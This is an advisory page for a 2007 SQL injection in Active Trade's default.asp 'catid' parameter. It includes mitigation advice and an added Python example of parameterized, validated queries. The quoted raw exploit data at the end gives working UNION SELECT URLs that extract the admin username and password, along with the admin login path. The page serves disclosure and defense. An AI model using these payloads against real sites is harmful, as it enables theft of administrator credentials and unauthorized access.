Vendor: Active Trade
By: CyberGhost
CVSS: 7.5 (HIGH)
SQL Injection (CWE-89)
Product Name: Active Trade
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Active Trade Remote SQL Injection Vulnerability

This vulnerability allows an attacker to execute SQL queries against the application's database. By manipulating the 'catid' parameter of default.asp, as in the URLs listed in the raw data below, an attacker can retrieve sensitive information from the database, such as admin usernames and passwords.

Mitigation:

To mitigate this vulnerability, the developer should validate input and use parameterized queries so that request values are never interpreted as SQL. Additionally, the latest version of the software should be used, as it may contain patches for this vulnerability.
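
The mitigation described above, shown as an added example (not code from the advisory or from Active Trade): the same 'catid' value handled by a concatenated query and by a validated, parameterized one. The products table, the sample rows and the function names are assumptions; only the admins table, its column names and the request value come from the page, and Python with sqlite3 stands in for the application's ASP data layer.

```python
import sqlite3

# The page's own request value, URL-decoded ('+' and %20 are spaces).
PAGE_VALUE = "-1 union select 0,adminname,2 from admins where adminid=1"

def make_db():
    # Constructed sample data. The products table is hypothetical; the admins
    # table and its column names are the ones named in the advisory.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE products (catid INTEGER, name TEXT, price INTEGER);
        CREATE TABLE admins (adminid INTEGER, adminname TEXT, password TEXT);
        INSERT INTO products VALUES (1, 'Sample item', 10);
        INSERT INTO admins VALUES (1, 'constructed-admin', 'constructed-secret');
    """)
    return db

def list_concatenated(db, catid):
    # 'Before': the request value becomes part of the SQL text and is parsed as SQL.
    sql = "SELECT catid, name, price FROM products WHERE catid=" + catid
    return db.execute(sql).fetchall()

def list_parameterized(db, catid):
    # Parameterization alone: the value is bound as data, so the UNION is never parsed.
    sql = "SELECT catid, name, price FROM products WHERE catid = ?"
    return db.execute(sql, (catid,)).fetchall()

def list_hardened(db, catid):
    # Input validation: catid must be a short run of ASCII digits and nothing else.
    if not (catid.isascii() and catid.isdigit() and len(catid) <= 9):
        raise ValueError("catid must be a non-negative integer")
    # Bind the validated integer instead of building the SQL string.
    sql = "SELECT catid, name, price FROM products WHERE catid = ?"
    return db.execute(sql, (int(catid),)).fetchall()

if __name__ == "__main__":
    db = make_db()
    print("concatenated :", list_concatenated(db, PAGE_VALUE))
    print("parameterized:", list_parameterized(db, PAGE_VALUE))
    print("hardened, catid=1:", list_hardened(db, "1"))
    try:
        list_hardened(db, PAGE_VALUE)
    except ValueError as exc:
        print("hardened, page value rejected:", exc)
```

Rejected values are worth logging on the server side, since a 'catid' that is not a plain integer is a useful detection signal for this class of request.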

Exploit-DB raw data:

#Title  : Active Trade Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page   : http://www.activewebsoftwares.com/demoactivetrade
#Script Page : http://www.activewebsoftwares.com/productinfo.aspx?productid=32

#Vuln.

#Username : /default.asp?catid=-1+union+select+0,adminname,2+from+admins%20where%20adminid=1
#Password : /default.asp?catid=-1+union+select+0,password,2+from+admins%20where%20adminid=1

#Admin Login : /admin.asp
====================================

Thanx : redLine - Hackinger - excellance - Liarhack - SaCReD SeeR - MaTRax - KinSize - BolivaR - kerem125 - by_emR3

And All TURKISH HACKERS !

# milw0rm.com [2007-03-23]